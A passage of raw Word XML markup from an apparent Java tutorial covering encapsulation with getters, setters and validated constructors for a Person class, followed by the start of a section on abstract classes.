          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Providing Public Getter and Setter Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729EBDC4" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Create public methods to access and modify private fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE30A0E"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Person</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77058CAE"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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF2E7FF"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BAF3FC"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762ED5EC"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Getter for name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1B498"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getNam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710A20C7"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C987259"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6F678424"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714541AD"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Setter for name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F57992"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setName</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nam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4C4582EC"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thi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nam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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BC6A02"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543B9323"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0C887957"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Getter for age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA3A6FD"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> getAg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234A3471"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CAA88B"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29B0C001"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7CC2A23A"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Setter for age with validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6904B"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setAge</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ag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2F6A6596"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f</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age </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&g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0</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validation logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC80B41"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thi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ag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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58647555"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20F62AFA"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1EDB7E48"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6588523E" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Implementing Constructors with Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C7F64E" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Initialize fields through constructors with validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740E9C0"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Person</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nam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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ag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2054354E"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thi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nam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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DC0E9"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f</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age </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&g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0</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2E2E80BD"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thi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ag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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490DA12F"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2AED6FB4"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E307E2" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB24B7C" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefits of Encapsulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C069A8E" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data Hiding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Internal representation is hidden from outside</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14641081" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Increased Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can change internal implementation without affecting other code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9F350" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Encapsulated code is easier to reuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5824B9" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can add validation logic in setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09858CD3" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Easier to maintain and modify code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6378364B" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7CB91"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Main</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2CD937DE"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stat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main</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String</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arg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24411059"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Person</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> person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Person</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Alic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30</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1CF1DB"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4477625C"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Access through getters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33052A61"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erson</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getNam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Alice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6837A59A"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erson</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getAg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30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D8E108"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503DD2D0"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Modify through setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD4668"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person</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setAge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413039C"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person</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setName</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Alice Smith"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787E4D03"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205D6806"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Invalid age won't be set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C7271"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person</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setAge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5</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age remains 31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F1EBB"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5AFAE94A" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00E004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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D49160" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc196307594"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is abstract in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w14:paraId="03D9F362" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abstract</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> is a non-access modifier that can be applied to classes and methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AB278" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417D8474" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850" w:rsidP="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Abstract Class: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Abstract is a non-access modifier that can be applied to classes and methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F2E56" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cannot be instantiated (cannot create objects)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B144B4" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Can contain both abstract and concrete methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A56E5B" w14:textId="77777777" w:rsidR="00C55850" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55850">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
